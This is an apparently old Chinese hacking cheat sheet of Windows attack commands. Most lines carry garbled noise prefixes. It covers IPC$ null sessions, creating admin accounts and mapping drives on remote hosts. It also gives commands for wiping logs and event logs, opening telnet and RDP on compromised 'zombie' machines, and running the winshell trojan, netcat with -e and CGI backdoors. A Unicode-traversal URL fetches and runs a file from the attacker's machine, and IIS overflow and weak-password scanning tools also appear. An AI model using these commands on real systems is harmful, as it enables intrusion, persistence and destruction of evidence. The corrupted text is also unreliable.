网管和黑客都必须知道的命令
23AMrDF=N� 常用的几条NET命令:
�z!r-g(^G� �7z��=zJ4C (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
3��.
��kP, gf��Ph�t 5 (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
-!k$ ���Z "#a_--"k9� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
1�b,�,uI_ R\B-��cU[, (查看远程主机时间) net time \\IP地址
�nf7l}^/UE eXqS9`zK�r (定时启动某个程序) at \\IP地址 02:18 readme.exe
JQhw�>H9�& :q
xd])�- (查看共享) net view \\IP地址
Xo{|�m��[, w�,t>M_(�N (查看netbios工作组列表) nbtstat -A IP地址
=&J�7
'nDP �>+ZG�{'!j (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
JToc(�"V� �;�gC.fpu� (这两条把自己增加到管理员组): net user 用户名 密码 /add
#=G�[�~�m\ ����.UUY9@ net localgroup Administrators 用户名 /add
�$�~[k?��D Sj$XRkbj�: (断开连接) net use \\IP地址\ipc$ /delete
Uo!#p'<w)p H��|1owmbD 扫尾:
�FO��FZ/q� /NH9$�u.�g del C:\winnt\system32\logfiles\*.*
f�<`�is+"� $��
{iV]Xt del C:\winnt\ssytem32\config\*.evt
��4|9c+^%^ .%D9�leiRe del C:\winnt\system32\dtclog\*.*
B~�o;�,�} e*7nq�~ B5 del C:\winnt\system32\*.log
lA���xbF�� �0
s�-IW�� del C:\winnt\system32\*.txt
r
pv�`�% k�XmnLxhS/ del C:\winnt\*.txt
hf/6�VlZ�� �~q�G`~�/7 del C:\winnt\*.log
uK�:?6��>H =lzRx%�tm 一、netsvc.exe
a5v�}w7vL� TfD]`v`] � 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
B}�%B4�&Ij rH�ir�>�
p netsvc /list \\IP地址
iG����\��] m�@r+M"�!R netsvc schedule \\IP地址 /query
]pZxb�s&Vb ^=H.� .pr� netsvc \\IP地址 schedule /start
�RGw=�!0�V {c'2{`px 5 二、OpenTelnet.exe
��C�Mm:Vea �%V>Ss9;/8 远程启动主机的Telnet服务,并绑定端口到7878,例如:
ND��JIaX:] �iBq|�]��� OpenTelnet \\IP地址 用户名 密码 1 7878
po�hA??t2: y��&HfF�~� 然后就可以telnet到主机的7878端口,进入DOS方式下:
x*G�-?Xza) 4xg7�oo0iJ telnet IP地址 7878
y�|BRAk�&n 8E �m� ��X 三、winshell.exe
"Dc6kn^}3� *?z�yF@K{% 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
d+�1q[,��- 9���a�ED6 p Path (查看winshell主程序的路径信息)
T�TS.wBpR, %>dCA��j"� b reBoot (重新启动机器)
��u�7_I��O 9t.�u9C=!F d shutDown (关闭机器)
qP�"+SVq�C %nTgrgS(�= s Shell (执行后你就会看到可爱的“C:\>”)
lG�\6z�"K� �tSr.0�'CE x eXit (退出本次登录会话,此命令并不终止winshell的运行)
)%4%Uo_Xm� ,����c�bCt CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�HC��4ve�t Sv�s!C+:le 四、3389登陆器,GUI方式登录远程主机的
?R��
4��sH :u%Jrc�(�W 五、elsave.exe
4,8=0[e�RG N3D�{t\hg� 事件日志清除工具
Sn� I-dXNF i@=0fHi�ZQ elsave -s \\IP地址 -l "application" -C
?o�naJ�=mT 8X6F6RK6,1 elsave -s \\IP地址 -l "system" -C
CCC�d=s��. uQwKnD?F+e elsave -s \\IP地址 -l "security" -C
�Xkn��p*(9 MZy�zc{c, 执行后成功清除应用程序日志,系统日志,安全日志
,t`�u3yk�h ��Y:G�Sjq� 六、hbulot.exe
Qi
3���d�i �^�x�W�u7q 开启win2kserver和winxp的3389服务
�Vv"JN?dHi a�Z�[
a�ZU hbulot [/r]
Uxla,CCp-� ~��
�.��} 使用/r表示安装完成后自动重起目标使设置生效。
PS�OW}Y�|q e)pQh&��uD 七、nc.exe(netcat.exe)
y4%�u<��/� {XT3M{`rWL 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
&n_a��MZ; -^C�'t_Q o 想要连接到某处: nc [-options] hostname port[s] [ports] ...
pz��X684� OLT��hi[Yn 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
|v,5s=}��7 O�5��:�?nD 参数:
5��p�J)O�X ��::k>V\�; -e prog 程序重定向,一旦连接,就执行 [危险!!]
ra�="4T$va WE_jT1^/� -g gateway source-routing hop point[s], up to 8
DB��1�GW�, 0q|.]:][Eo -G num source-routing pointer: 4, 8, 12, ...
�>/*wlY!E� ��B�oJ�Y�P -h 帮助信息
Aq��P�E.mf T�7vS�p<i/ -i secs 延时的间隔
YL(7l�|^�! ���|T!^&t� -l 监听模式,用于入站连接
9ANC��,+0p �AOT +4*)% -n 指定数字的IP地址,不能用hostname
p�$>e�{�-u _/@VV5�M�q -o file 记录16进制的传输
F\' ^D��tB mN5`Fct*A> -p port 本地端口号
��W�D� wW` <78]OZ] Z� -r 任意指定本地及远程端口
z:R�clDm +~gqP����k -s addr 本地源地址
:l�F[k`S T /i$��-ws-� -u UDP模式
_c�z&f�%qr f.V����1� -v 详细输出——用两个-v可得到更详细的内容
I)�
m�P��? N|Cx";,|FZ -w secs timeout的时间
<AZ21"�oR/ �~V��NN� -z 将输入输出关掉——用于扫描时
�6�4���qm� 八、TFTPD32.EXE
W/z\j/Rg�c oV4+w_rrLc 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
S >�E|�A�% ��Y)?dq(�� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
"`b�"�PQ<x n5nV4�6�1U 然后可以直接令文件运行:
@�,Je*5$o" �6X�V�r-ef http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
[���i�JU{W $
O1w�6\}_ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
Vb$�{O�y+� ��PQ�l�a-� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
ZTC�zD���8 Yzr Rn��Vr 一、一 Xscan命令行运行参数说明:
PUM�h#^g�} 5k��0r{^#M 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�l?>s�LKo9 ;B�%NFv�G� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
z�tS�P4lW� )�Fc�`�r�Y xscan -file <主机列表文件名> <检测项目> [其他选项]
��]Lc:M'V# l��2v4SvbX 其中<检测项目> 含义如下:
��mL\j^q,Y a�d�HZ�X� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
<+MNv#1�:w 3��t����� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
pdcP��;.�� H�*#�L~!�] -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
@�"M�%ZnFu Qo*,2B9R L -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
BMw_F�)hTO �sE*�A,z?� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
EN��lqoj1� X#l]%�IrW! [其他选项] 含义如下:
T6��s~�f$G 8�no_�xFA -v: 显示详细扫描进度
.C�
avb�� n^8��LF�9r -p: 跳过Ping不通的主机
#;Y�n8'�a~ u{0'"�jVJ� -o: 跳过没有检测到开放端口的主机
h�kzy��I~7 O34'c_ f�Z -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
